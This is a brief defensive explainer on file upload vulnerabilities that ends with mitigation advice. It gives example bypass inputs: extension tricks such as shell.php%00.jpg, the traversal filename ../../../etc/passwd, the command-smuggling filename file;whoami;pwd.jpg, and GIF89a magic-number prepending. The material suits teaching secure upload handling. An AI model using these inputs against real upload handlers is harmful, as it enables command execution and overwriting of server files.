File Upload Vulnerabilities

Uploading files represents a frequent web application function. However, many developers mistakenly believe the task concludes once a file successfully reaches the server. This oversight creates security gaps that threat actors exploit. True completion requires two conditions: the upload succeeds AND occurs securely.

Extension-Based Bypasses

Developers commonly validate file types through extension checking using whitelists or blacklists. However, these approaches have weaknesses. Case-sensitive regex patterns allow uploads like shell.pHp to bypass restrictions. Improperly anchored patterns permit files like shell.php.jpg to be accepted. Filename truncation can result in a file ending with .php rather than .jpg.

Null-Byte Injection

Renaming files as shell.php%00.jpg exploits how certain languages treat null bytes as terminators, allowing PHP execution despite appearing to end in .jpg.

SVG and XML Threats

SVG files are XML data vulnerable to stored cross-site scripting attacks. Malicious JavaScript embedded within SVG files executes when users download them.

Directory Traversal

Filenames like ../../../etc/passwd can overwrite critical server files. Mitigation requires using randomly-generated filenames with original names stored separately as metadata.

Denial of Service

Concurrent uploads of large files exhaust server resources or disk space. File size validation provides essential protection.

Content-Type Spoofing

The Content-Type header is easily manipulated through interception tools. Server interpretation relies on actual file content, not headers.

Magic Number Evasion

Attackers prepend valid file signatures like GIF89a to malicious files to deceive magic number validation systems.

Command Injection

When filenames pass to system binaries, names like file;whoami;pwd.jpg enable command execution. Random filenames eliminate this risk.

Security Recommendations

Developers should avoid trusting user input entirely. Implementation of specialized validation software, maintenance of updated dependencies, and evaluation of multiple validation factors strengthens defenses.